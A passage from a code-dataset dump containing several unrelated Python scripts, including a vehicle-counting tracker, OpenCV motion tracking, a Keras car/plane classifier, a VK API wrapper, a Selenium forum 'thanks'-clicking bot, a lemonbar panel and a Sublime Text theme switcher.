center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': True,\n 'direction': 'unknown',\n 'speed': 'unknown',\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n else:\n speed = center[0] - pre_center[0]\n direction = 'left' if speed < 0 else 'right'\n\n # 車体が進入範囲にあるか調べる\n is_entried_from_left = self.pre_detected_obj_dicts[label_idx]['is_entried_from_left']\n is_exited_to_right = self.pre_detected_obj_dicts[label_idx]['is_exited_to_right']\n is_entried_from_right = self.pre_detected_obj_dicts[label_idx]['is_entried_from_right']\n is_exited_to_left = self.pre_detected_obj_dicts[label_idx]['is_exited_to_left']\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n # 左右の進入判定がなく、右への退出判定がない場合\n if not is_entried_from_left and not is_entried_from_right and not is_exited_to_right:\n is_entried_from_left = True\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n # 左右の進入判定がなく、左への退出判定がない場合\n if not is_entried_from_left and not is_entried_from_right and not is_exited_to_left:\n is_entried_from_right = True\n self.entry_from_right_count += 1\n\n # 車体が退出範囲にあるか調べる\n if self.exit_to_left_range[0] < center[0] < self.exit_to_left_range[1]:\n # 右からの進入判定があり、左への退出判定がない場合\n if is_entried_from_right and not is_exited_to_left:\n is_exited_to_left = True\n self.exit_to_left_count += 1\n elif self.exit_to_right_range[0] < center[0] < self.exit_to_right_range[1]:\n # 左からの進入判定があり、右への退出判定がない場合\n if is_entried_from_left and not is_exited_to_right:\n is_exited_to_right = True\n self.exit_to_right_count += 1\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': False,\n 'direction': direction,\n 'speed': speed,\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for v in detected_obj_dicts.values():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n out_label_idxs.append(label_idx)\n out_scores_2.append(score)\n out_classes_2.append(c)\n out_colors_2.append(color)\n\n vanishing_label_idxs = []\n if len(self.pre_detected_obj_dicts) != 0:\n # 消えたラベル番号を特定\n cur_label_idxs = detected_obj_dicts.keys()\n for k in self.pre_detected_obj_dicts.keys():\n label_idx = k\n if not label_idx in cur_label_idxs:\n vanishing_label_idxs.append(label_idx)\n\n # 車体の重なり判定\n pre_label_idxs = self.pre_detected_obj_dicts.keys()\n for vanishing_label_idx in vanishing_label_idxs:\n for label_idx in pre_label_idxs:\n if vanishing_label_idx != label_idx:\n # 前フレームで、X座標が重なっているか確認\n v1 = self.pre_detected_obj_dicts[vanishing_label_idx]\n v2 = self.pre_detected_obj_dicts[label_idx]\n\n l1 = v1['left']\n r1 = v1['right']\n l2 = v2['left']\n r2 = v2['right']\n\n if l1 < l2 < r1 < r2 or l2 < l1 < r2 < r1:\n stack_dict = {}\n stack_dict[vanishing_label_idx] = self.pre_detected_obj_dicts[vanishing_label_idx]\n stack_dict[label_idx] = self.pre_detected_obj_dicts[label_idx]\n self.overlap_dicts.append(stack_dict)\n\n self.pre_detected_obj_dicts = detected_obj_dicts\n\n print('use_label_idxs:', use_label_idxs)\n print('vanishing_label_idxs:', vanishing_label_idxs)\n if len(self.overlap_dicts) == 0:\n print('self.overlap_dicts: None')\n else:\n print('self.overlap_dicts:')\n for i, d in enumerate(self.overlap_dicts):\n print('----------', i, '----------')\n for k, v in d.items():\n print('label_idx:', k, '=>', v)\n print('-----------------------')\n print('detected_obj_dicts:')\n for k, v in detected_obj_dicts.items():\n print('label_idx:', k, '=>', v)\n\n print('self.entry_from_left_count:', self.entry_from_left_count)\n print('self.entry_from_right_count:', self.entry_from_right_count)\n print('self.exit_to_left_count:', self.exit_to_left_count)\n print('self.exit_to_right_count:', self.exit_to_right_count)\n\n # ラベル番号に被りがないかチェック\n label_idxs_for_debug = detected_obj_dicts.keys()\n\n assert len(label_idxs_for_debug) == len(set(label_idxs_for_debug))\n\n return out_boxes_2, out_label_idxs, out_scores_2, out_classes_2, out_colors_2\n","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":24198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"580974094","text":"# -*- coding: utf-8 -*-\n\n\nimport sys\nsys.path.append(\"../\")\nfrom geometry.vec import *\nfrom geometry.circle import *\nfrom geometry.line import *\nfrom pathfinding import *\n\n\n# importation de la bibliotheque graphique Tkinter\nfrom Tkinter import *\n# creation d’une fenetre\nfenetre=Tk()\nfenetre.title('dessin')\n# creation d’un canevas\ncanevas=Canvas(fenetre)\ncanevas.configure(width=500,height=500,bg='white')\ncanevas.pack()\n\nline = None\npion = Vec2(250,250)\ncircle = Circle(pion,50)\ntype = 1\n\ndef clic(event):\n\tglobal type\n\ttype = -type\n\tmotion(event)\n\ndef motion(event):\n\tglobal line\n\tif line: canevas.delete(line)\n\tT = Vec2(event.x,event.y).tangente(circle,type)\n\t#T = circle.tangente(Vec2(event.x,event.y),type)\n\tline = T.tracer(canevas,fill=\"black\")\n\ncanevas.bind('', clic)\ncanevas.bind('', motion)\n\n\ncanevas.create_oval(pion.x-50,pion.y-50,pion.x+50,pion.y+50,outline='blue',width=1)\n\n# attente des evenements\nfenetre.mainloop()\n","sub_path":"IA/testpath/test_tangente_point.py","file_name":"test_tangente_point.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"324791821","text":"\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef rescale_frame(frame, percent=75):\r\n width = int(frame.shape[1] * percent/ 100)\r\n height = int(frame.shape[0] * percent/ 100)\r\n dim = (width, height)\r\n return cv2.resize(frame, dim, interpolation =cv2.INTER_AREA)\r\ndef GrayTo3DGray(img_gray):\r\n h,w=img_gray.shape \r\n gray3D=np.zeros((h,w,3),dtype=np.uint8)\r\n for i in range(0,3):\r\n gray3D[:,:,i]=img_gray\r\n return gray3D\r\n\r\n\r\n\r\nfile=\"videos/Dance_1.mp4\"\r\ncap = cv2.VideoCapture(file)\r\n\r\nfourcc =cv2.VideoWriter_fourcc('m', 'p', '4', 'v') # ファイル形式(ここではmp4) #cv2.VideoWriter_fourcc(*'XVID')\r\noutname=\"videos/Dance_layertest.mp4\"\r\n\r\nout=None\r\navg=None\r\ni=0\r\nw=None\r\nh=None\r\nBGRcol=[0,255,255]\r\n\r\n\r\nwhile(cap.isOpened()):\r\n\r\n try:\r\n i+=1\r\n ret,frame= cap.read()\r\n frame= rescale_frame(frame,percent=8)\r\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n\r\n #accumulate Weighted\r\n # 前フレームを保存\r\n if avg is None:\r\n avg = gray.copy().astype(\"float\")\r\n \r\n continue\r\n #if i % 50 ==1:\r\n # avg = gray.copy().astype(\"float\")\r\n # continue\r\n\r\n cv2.accumulateWeighted(gray,avg,0.1)\r\n frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))\r\n\r\n #領域を抽出\r\n threash=cv2.threshold(frameDelta,50,225,cv2.THRESH_BINARY)[1]\r\n # 輪郭を見つける\r\n #_, contours, hierarchy = cv2.findContours(thresh.copy(), \r\n #cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n #新しいのフラームを作成する\r\n if w==None:\r\n h,w,c=frame.shape\r\n background=np.zeros((h,w,3),dtype=np.uint8)\r\n mask=np.zeros((h,w,3),dtype=np.uint8)\r\n for c,col in enumerate(BGRcol):\r\n background[:,:,c]=col\r\n mask[:,:,c]=threash\r\n #print(background.shape)\r\n #print(mask.shape)\r\n mask=GrayTo3DGray(threash)\r\n frame_masked = cv2.bitwise_and(background,mask)\r\n\r\n gray=GrayTo3DGray(gray)\r\n frameDelta=GrayTo3DGray(frameDelta)\r\n\r\n frametop=cv2.hconcat([gray,frameDelta])\r\n framebot=cv2.hconcat([mask,frame_masked])\r\n outframe=cv2.vconcat([frametop,framebot])\r\n \r\n cv2.imshow(\"Dance\",outframe)\r\n\r\n if out==None:\r\n h,w,c=gray.shape\r\n out = cv2.VideoWriter(outname,fourcc, 20.0, (2*h,2*w))\r\n\r\n out.write(outframe)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n except:\r\n break\r\ncap.release()\r\nout.release()\r\ncv2.destroyAllWindows()","sub_path":"motion_track_writeVideo.py","file_name":"motion_track_writeVideo.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"263252225","text":"from typing import Optional\r\n\r\n\r\nclass HyperCINoiseScalar(float):\r\n def __new__(cls, scale_factor=0.0):\r\n return super().__new__(cls, scale_factor)\r\n\r\n def __init__(self, scale_factor=0.0):\r\n \"\"\"\r\n The hyper_ci-parameter factor by which the noises is scaled when included in the model-fitting process.\r\n \"\"\"\r\n float.__init__(scale_factor)\r\n\r\n def scaled_noise_map_from(self, noise_scaling):\r\n \"\"\"\r\n Returns the scaled noises map, by multiplying the noises-scaling image by the hyper_ci-parameter factor.\r\n \"\"\"\r\n return self * noise_scaling\r\n\r\n\r\nclass HyperCINoiseCollection:\r\n def __init__(\r\n self,\r\n regions_ci: Optional[HyperCINoiseScalar] = None,\r\n parallel_eper: Optional[HyperCINoiseScalar] = None,\r\n serial_eper: Optional[HyperCINoiseScalar] = None,\r\n serial_overscan_no_eper: Optional[HyperCINoiseScalar] = None,\r\n ):\r\n self.regions_ci = regions_ci\r\n self.parallel_eper = parallel_eper\r\n self.serial_eper = serial_eper\r\n self.serial_overscan_no_eper = serial_overscan_no_eper\r\n\r\n @property\r\n def as_dict(self):\r\n hyper_dict = {\r\n \"regions_ci\": self.regions_ci,\r\n \"parallel_eper\": self.parallel_eper,\r\n \"serial_eper\": self.serial_eper,\r\n \"serial_overscan_no_eper\": self.serial_overscan_no_eper,\r\n }\r\n\r\n return {key: value for key, value in hyper_dict.items() if value is not None}\r\n","sub_path":"autocti/charge_injection/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"12255951","text":"'''\nUSAGE:\nform_request = {'access_token': VK_TOKEN,\n'v': str(API_VERSION),\n'param1': 'val1',\n'param2': 'val2'}\nrequest = Api('users.get', form_request)\nresponse = request.response\n'''\nimport requests\n\nclass Api(object):\n def __init__(self, str, dict):\n self.method = str\n self.args = dict\n self.response = {}\n if self.method != 'messages.getLongPollHistory':\n self.call()\n else:\n self.mcall()\n\n def call(self):\n form = 'https://api.vk.com/method/%s?' %self.method\n fd = {}\n for param, value in self.args.items():\n fd[param] = value\n request = requests.get(form, params=fd)\n response = request.json()\n self.response = response\n\n def mcall(self):\n form = 'http://%s?' %self.args.pop('server')\n for param, value in self.args.items():\n form = form + param + '=' + str(value) + '&'\n form = form[:-1]\n request = requests.get(form)\n response = request.json()\n self.response = response","sub_path":"myvkapi.py","file_name":"myvkapi.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"126815278","text":"from contextlib import contextmanager\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom selenium.webdriver import ActionChains\nimport time\n\n\n@contextmanager\ndef selen(driver_patch: str, profile_patch: str, config='windows') -> webdriver.Chrome:\n \"\"\"\n Самый удобный метод использования веб драйвера =)\n :param driver_patch: str: patch to chromedriver(exe)\n :param profile_patch: str: the path to the folder storing cookies\n :param config: str: operating system\n :return: webdriver.Chrome\n \"\"\"\n\n def windows_conf():\n options = webdriver.ChromeOptions()\n options.add_argument(f'user-data-dir={profile_patch}')\n driver = webdriver.Chrome(executable_path=driver_patch, chrome_options=options)\n return driver\n\n def linux_conf():\n options = webdriver.ChromeOptions()\n arguments = ('headless', '--no-sandbox', '--disable-dev-shm-usage', f'user-data-dir={profile_patch}')\n for option in arguments:\n options.add_argument(option)\n\n driver = webdriver.Chrome(executable_path=driver_patch, chrome_options=options)\n return driver\n\n configs = {'windows': windows_conf, 'linux': linux_conf}\n web_driver = configs.get(config)()\n\n try:\n yield web_driver\n web_driver.close()\n time.sleep(1)\n web_driver.quit()\n\n except Exception as error:\n web_driver.close()\n time.sleep(1)\n web_driver.quit()\n raise Exception(error)\n\n\nwith selen(r'C:\\chromedriver.exe', 'C:\\profile') as browser:\n # Стартовая страница\n browser.get('http://nnmclub.to/forum/portal.php?c=10')\n\n def get_all_posts_page() -> list:\n # Получаем все ссылки на посты внутри одной страницы.\n\n p = browser.find_elements_by_xpath('//a[@class=\"pcomm tit-b bold\"]')\n posts = []\n\n for i in p:\n posts.append(i.get_attribute(\"href\"))\n\n # Переход на следующую страницу\n browser.find_element_by_link_text(u\"След.\").click()\n return posts\n\n\n def scrapy_links(iter:int) -> list:\n # Принимаем число страниц которые нужно собрать, отадёт список ссылок.\n good_list = []\n for page in range(iter):\n good_list.extend(get_all_posts_page())\n\n return good_list\n\n\n def thanks():\n # Ищет на странице кнопку спасибо, если она есть и не нажата то нажимает.\n\n try:\n bottom = browser.find_element_by_xpath(u\"//img[@alt='Спасибо']\")\n bottom.click()\n\n except NoSuchElementException:\n pass\n\n\n def main():\n all_link = scrapy_links(10)\n for i in all_link:\n browser.get(i)\n thanks()\n\n main()\n","sub_path":"merci.py","file_name":"merci.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448929782","text":"import pexpect, atexit\nfrom threading import Thread, Lock\nfrom time import time, sleep\nimport xrdb\n\n\ndef delay_loop(delay):\n\t\"\"\"DECORATOR: runs function in infinite loop,\n\tsleeps until time is next multiple of \n\t\"\"\"\n\tdef wrapper(function):\n\t\tdef wrappee(*args):\n\t\t\twhile True:\n\t\t\t\tstart_time = time()\n\t\t\t\tfunction(*args)\n\t\t\t\telapsed = (time() - start_time) % delay\n\t\t\t\tsleep(delay - elapsed)\n\t\treturn wrappee\n\treturn wrapper\n\nclass PopenLoopThread(Thread):\n\t\"\"\"PopenLoopThread(command, delay, **Thread_kwargs):\n\tGiven `command` and `delay`, run command every delay seconds`\n\t\"\"\"\n\tdef __init__(self, command, delay, *args, **kwargs):\n\t\tself.lock = Lock()\n\t\tself.command = command\n\t\tif not command:\n\t\t\tself.run = lambda: None\n\t\telif delay:\n\t\t\tself.run = delay_loop(delay)(self.run)\n\t\tself._state = \"\"\n\t\tsuper().__init__(**kwargs)\n\n\tdef update(self):\n\t\tself.lock.acquire()\n\t\tself._state = pexpect.runu(self.command)[:-2]\n\t\tself.lock.release()\n\n\tdef run(self):\n\t\tself.update()\n\n\t@property\n\tdef state(self):\n\t\ttry:\n\t\t\tself.lock.acquire()\n\t\t\treturn self._state\n\t\tfinally:\n\t\t\tself.lock.release()\n\nclass Chunk(PopenLoopThread):\n\t\"\"\"PopenLoopThread wrapped with styling and formatting\"\"\"\n\tdef __init__(self, *args, **kwargs):\n\t\tself.format = kwargs.pop('formatter', None)\n\t\tself.background = kwargs.pop('background', None)\n\t\tself.foreground = kwargs.pop('foreground', None)\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef render(self, prev=None, next=None):\n\t\tret_str = \"\"\n\t\tif prev:\n\t\t\tsep = ''\n\t\t\tif prev.background:\n\t\t\t\tsep = \"%{B\" + prev.background + \"}\" + sep + \"%{B-}\"\n\t\t\t\tsep = \"%{F\" + (self.background or prev.background) + \"}\" + sep + \"%{F-}\"\n\t\t\tret_str += sep\n\t\tstate = ' ' + self.state + ' '\n\t\tif self.foreground:\n\t\t\tstate = \"%{F\" + self.foreground + \"}\" + state + \"%{F-}\"\n\t\tif self.background:\n\t\t\tstate = \"%{B\" + self.background + \"}\" + state + \"%{B-}\"\n\t\tret_str += state\n\t\tif next:\n\t\t\tsep = ''\n\t\t\tif next.background:\n\t\t\t\tsep = \"%{B\" + next.background + \"}\" + sep + \"%{B-}\"\n\t\t\t\tsep = \"%{F\" + (self.background or next.background) + \"}\" + sep + \"%{F-}\"\n\t\t\tret_str += sep\n\t\treturn ret_str\n\n\t@property\n\tdef state(self):\n\t\tif self.format:\n\t\t\treturn self.format(super().state)\n\t\treturn super().state\n\nclass Panel:\n\tdef __init__(self, height=None, font=None, foreground=None, background=None):\n\t\t\"\"\"\n\t\tStart the lemonbar process with an open pipe, and prepare bspwm.\n\t\t\"\"\"\n\t\tself.thread = {}\n\t\tself.xrdb = xrdb.query(self.__class__.__name__)\n\t\tself.height = height or self.xrdb['height'] or 12\n\t\tself.font = font or self.xrdb['font'] or 'Monospace Sans'\n\t\tself.foreground = foreground or self.xrdb.get('foreground') or '#ffffff'\n\t\tself.background = background or self.xrdb.get('background') or '#000000'\n\t\tself._layout = {'l': [], 'r': [], 'c': []}\n\n\t\tself.bar = pexpect.spawn(\"lemonbar\" +\\\n\t\t\t\t\" -g x\" + self.height +\\\n\t\t\t\t\" -f '\" + self.font + \"'\" +\\\n\t\t\t\t\" -F \" + self.foreground +\\\n\t\t\t\t\" -B \" + self.background)\n\t\tpexpect.run(\"bspc config top_padding \" + self.xrdb['height'])\n\t\tatexit.register(self.cleanup)\n\n\tdef start_thread(self, name, command, delay, formatter=None, background=None, foreground=None):\n\t\txrdb = self.xrdb.get(name)\n\t\tbackground = background or (xrdb and xrdb.get('background'))\n\t\tforeground = foreground or (xrdb and xrdb.get('foreground'))\n\t\tself.thread[name] = Chunk(\n\t\t\t\tcommand, delay,\n\t\t\t\tformatter=formatter,\n\t\t\t\tbackground=background,\n\t\t\t\tforeground=foreground,\n\t\t\t\tdaemon=True)\n\t\tself.thread[name].start()\n\n\tdef layout(self, *chunks):\n\t\tif not chunks:\n\t\t\traise TypeError('layout takes >=2 arguments, but 1 was given')\n\t\targtype = type(chunks[0]).__name__\n\t\tif argtype == 'str':\n\t\t\talign = self._layout['l']\n\t\t\tfor chunk in chunks:\n\t\t\t\tif chunk in ['l', 'r', 'c', 'left', 'right', 'center']:\n\t\t\t\t\talign = self._layout[chunk[0]]\n\t\t\t\telse:\n\t\t\t\t\talign.append(chunk)\n\t\telse:\n\t\t\traise TypeError('invalid layout format')\n\n\t@delay_loop(1)\n\tdef run(self):\n\t\tformatted_state = \"\"\n\t\tfor align in ['l', 'c', 'r']:\n\t\t\tchunks = self._layout[align]\n\t\t\tformatted_state += '%{' + align + '}'\n\t\t\tfor i in range(len(chunks)):\n\t\t\t\tthread = self.thread[chunks[i]]\n\t\t\t\tif align == 'l':\n\t\t\t\t\tif i == len(chunks) - 1:\n\t\t\t\t\t\tnext = self\n\t\t\t\t\telse:\n\t\t\t\t\t\tnext = self.thread[chunks[i+1]]\n\t\t\t\t\tchunk = thread.render(next=next)\n\t\t\t\telif align == 'c':\n\t\t\t\t\tprev = next = None\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprev = self\n\t\t\t\t\tif i == len(chunks) - 1:\n\t\t\t\t\t\tnext = self\n\t\t\t\t\tchunk = thread.render(prev=prev, next=next)\n\t\t\t\telif align == 'r':\n\t\t\t\t\tif i == 0:\n\t\t\t\t\t\tprev = self\n\t\t\t\t\telse:\n\t\t\t\t\t\tprev = self.thread[chunks[i-1]]\n\t\t\t\t\tchunk = thread.render(prev=prev)\n\t\t\t\tformatted_state += chunk\n\t\tself.bar.sendline(formatted_state)\n\n\tdef cleanup(self):\n\t\tself.bar.terminate()\n\t\tpexpect.run(\"bspc config top_padding 0\")\n","sub_path":"panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502361878","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[5]:\n\n\n#import all necessary libraries for the CNN architecture \n\nimport keras\n\nimport numpy as np \n\nfrom keras import backend as K \n\nfrom keras import optimizers\n\nfrom keras.models import Sequential \n\nfrom keras.layers import Conv2D, MaxPooling2D \n\nfrom keras.layers import Activation, Dropout, Flatten, Dense \n\nfrom keras.optimizers import Adam\n\nfrom keras.metrics import categorical_crossentropy \n\nfrom keras.preprocessing.image import ImageDataGenerator \n\nfrom keras.layers.normalization import BatchNormalization\n\nfrom keras.layers.convolutional import *\n\nfrom matplotlib import pyplot as plt \n\nfrom sklearn.metrics import confusion_matrix\n\nimport itertools\n\nimport matplotlib.pyplot as plt\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n#with refernce to the location of your images; create path based on your defined parameters for the folders\ntrain_path = 'cars-and-planes/train'\nvalid_path = 'cars-and-plans/valid'\ntest_path = 'cars-and-planes/test'\n\n#number of samples\nnb_train_samples = 20\nnb_test_samples = 10\nnb_valid_samples =20\nepochs = 10\n\nif K.image_data_format() == 'channels_first': \n input_shape = (3, 224, 224) \nelse: \n input_shape = (224, 224, 3)\n \n#Models \n#build and Train a CNN \n#convolution is 2D image \n#input shape = height,width,channel dimension(rgb) \n#output filter = (3,3)\n#flatten layer =from rgb to 1D tensor then fed into dense layer\n#Conv2D is the layer to convolve the image into multiple images\n#Activation is the activation function.\n#MaxPooling2D is used to max pool the value from the given size matrix and same is used for the next 2 layers. \n#then, Flatten is used to flatten the dimensions of the image obtained after convolving it.\n#Dense is used to make this a fully connected model and is the hidden layer.\n#Dropout is used to avoid overfitting on the dataset.\n#Dense is the output layer contains only one neuron which decide to which category image belongs.\n\n\nmodel = Sequential() \nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape)) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Conv2D(32, (3, 3))) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Conv2D(64, (3, 3))) \nmodel.add(Activation('relu')) \nmodel.add(MaxPooling2D(pool_size=(2, 2))) \n \nmodel.add(Flatten()) \nmodel.add(Dense(64)) \nmodel.add(Activation('relu')) \nmodel.add(Dropout(0.5)) \nmodel.add(Dense(1)) \nmodel.add(Activation('sigmoid')) \n\nmodel.compile(loss ='binary_crossentropy', \n optimizer ='rmsprop', \n metrics =['accuracy']) \ntrain_datagen = ImageDataGenerator( \n rescale = 1. / 255, \n shear_range = 0.2, \n zoom_range = 0.2, \n horizontal_flip = True) \ntest_datagen = ImageDataGenerator(rescale = 1. / 255) \n \ntrain_batches = ImageDataGenerator().flow_from_directory(train_path, \n target_size =(224, 224), \n batch_size = 10, class_mode ='binary') \nvalid_batches = ImageDataGenerator().flow_from_directory(train_path, \n target_size =(224, 224), \n batch_size = 5, class_mode ='binary') \ntest_batches = ImageDataGenerator().flow_from_directory(train_path, \n target_size =(224, 224), \n batch_size = 10, class_mode ='binary') \nmodel.fit_generator(train_batches, \n steps_per_epoch = 4, \n epochs = 10, validation_data = valid_batches, \n validation_steps = 4, verbose=2) \nmodel.save_weights('model_saved.h5')\n\n\n\n\n","sub_path":"cars-and-planes.py","file_name":"cars-and-planes.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106249048","text":"#!/usr/bin/python\n\nimport os\nimport shutil\nimport sys\nfrom termcolor import colored\nfrom zipfile import ZipFile\n\n\nclass Theme_Changer():\n\n user_home = ''\n user_config = ''\n sub_dir = ''\n package_dir = ''\n pref_dir = ''\n user_config = ''\n theme_package = ''\n color_package = ''\n\n def __init__(self):\n self.get_paths()\n\n def get_paths(self):\n self.user_home = os.environ['HOME']\n self.sub_dir = self.user_home + '/.config/sublime-text-3/'\n self.package_dir = self.sub_dir + \"Installed Packages/\"\n self.pref_dir = self.sub_dir + 'Packages/User/'\n self.user_config = self.user_home + '/.config/sublime_preferences/'\n self.file_name = ''\n\n def validate(self):\n if not os.path.isdir(self.sub_dir):\n raise FileNotFoundError(\"Can't find sublime config directory in {}\".format(self.sub_dir))\n if not os.path.isdir(self.package_dir):\n raise FileNotFoundError(\"Can't find sublime installed packages directory at {}\".format(self.package_dir))\n if not os.path.isdir(self.pref_dir):\n raise FileNotFoundError(\"Can't find sublime user packages directory at {}\".format(self.pref_dir))\n\n if not os.path.exists(self.user_config):\n ans = input(\"\\nThere is not directory for your preferences.\\nWould you like to create one in \" + self.user_config + \"? [Y\\\\n] \")\n if ans.startswith('y'):\n os.makedirs(self.user_config)\n\n settings_files = os.listdir(self.user_config)\n if settings_files == []:\n ans = input(\"\\n\\nNo files in your preferences directory.\\nWould you like to copy over the default sublime preferences file? [Y\\\\n] \")\n if ans.startswith('y'):\n shutil.copyfile(self.pref_dir + 'Preferences.sublime-settings', self.user_config + 'Preferences.sublime-settings')\n\n def backup(self):\n # Copying the sublime preferences file to the current directory for safety\n shutil.copyfile(self.pref_dir + 'Preferences.sublime-settings', self.user_config + 'Old_Preferences.sublime-settings')\n\n def move_preferences(self, user_pref_file):\n # Copying new file to sublime preferences\n shutil.copyfile(user_pref_file, self.pref_dir + 'Preferences.sublime-settings')\n\n # Validate\n if os.path.isfile(self.pref_dir + 'Preferences.sublime-settings'):\n print(colored('Preferences Changed!', 'green'))\n else:\n print(self.error_message('Failed to change preferences'))\n\n def find_themes(self, package_dir):\n themes = {}\n\n packages = os.listdir(package_dir)\n for package in packages:\n contents = ZipFile(package_dir + package, 'r')\n contents = contents.namelist()\n for c in contents:\n if '.tmTheme' in c or '.sublime-theme' in c:\n theme_name = package[:package.find('.')]\n if theme_name not in themes:\n themes[theme_name] = []\n\n themes[theme_name].append(c)\n\n return themes\n\n def get_theme_settings(self, themes):\n os.system('clear')\n error = ''\n flag = True\n while flag:\n formatted_name = []\n curr = 1\n for theme, files in themes.items():\n print(theme + ':')\n for f in files:\n formatted = str(curr) + '. ' + f\n formatted_name.append(formatted)\n print(formatted)\n curr += 1\n\n print()\n\n if error != '':\n print(error)\n error = ''\n\n user_theme = input(\"Enter your new theme: \")\n user_color = input(\"Enter your new cholor scheme: \")\n\n for name in formatted_name:\n name_number = name[:name.find('.')]\n if name_number == user_theme:\n user_theme = name[name.find('.') + 2:]\n\n if name_number == user_color:\n user_color = name[name.find('.') + 2:]\n\n os.system('clear')\n flag = False\n if not user_theme.endswith('.sublime-theme'):\n error += self.error_message('Theme file must end with .sublime-theme!')\n flag = True\n if not user_color.endswith('.tmTheme'):\n error += self.error_message('Color scheme file must end with .tmTheme!')\n flag = True\n\n for key, value in themes.items():\n if user_theme in value:\n self.theme_package = key\n if user_color in value:\n self.color_package = key\n\n return (user_theme, user_color)\n\n def get_new_pref_file(self):\n os.system('clear')\n settings_files = os.listdir(self.user_config)\n print('Found {} files in {}'.format(len(settings_files), self.user_config))\n settings_files = os.listdir(self.user_config)\n curr = 1\n formatted_name = []\n for f in settings_files:\n formatted = str(curr) + '. ' + f\n formatted_name.append(formatted)\n print(formatted)\n curr += 1\n\n user_file = input(\"\\nEnter the file you would like to use for your preferences: \")\n\n for name in formatted_name:\n name_number = name[:name.find('.')]\n if name_number == user_file:\n user_file = name[name.find('.') + 2:]\n\n return self.user_config + user_file\n\n def update_user_pref_file(self, user_pref_file, themes):\n ans = input(\"Would you like to change the theme and color scheme of the preference file? [Y\\\\n] \")\n if not ans.startswith('y'):\n return\n\n user_theme, user_color = self.get_theme_settings(themes)\n\n with open(user_pref_file, mode='r+') as file:\n old_pref = file.readlines()\n file.seek(0)\n file.truncate() # clears file contents\n file.seek(0)\n for line in old_pref:\n if '\\\"color_scheme\\\"' in line:\n continue\n elif '\\\"theme\\\"' in line:\n continue\n elif '{' in line:\n file.write(line)\n file.write('\\t\\\"theme\\\": \\\"' + user_theme + '\\\",\\n')\n file.write('\\t\\\"color_scheme\\\": \\\"Packages/' + self.color_package + '/' + user_color + '\\\",\\n')\n else:\n file.write(line)\n\n def error_message(self, msg):\n return colored('\\nError: ', 'red') + msg\n\n\ntheme_changer = Theme_Changer()\ntheme_changer.validate()\nthemes = theme_changer.find_themes(theme_changer.package_dir)\nuser_pref_file = theme_changer.get_new_pref_file()\ntheme_changer.update_user_pref_file(user_pref_file, themes)\ntheme_changer.backup()\ntheme_changer.move_preferences(user_pref_file)\n","sub_path":"change_subl_settings.py","file_name":"change_subl_settings.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"108031527","text":"import pymysql\nfrom mysql_pool.sql_setting import mysqlInfo\nfrom DBUtils.PooledDB import PooledDB\n\n\nclass ConnMysql(object):\n __pool = None\n\n def __init__(self):\n # 构造函数,创建数据库连接、游标\n self.coon = 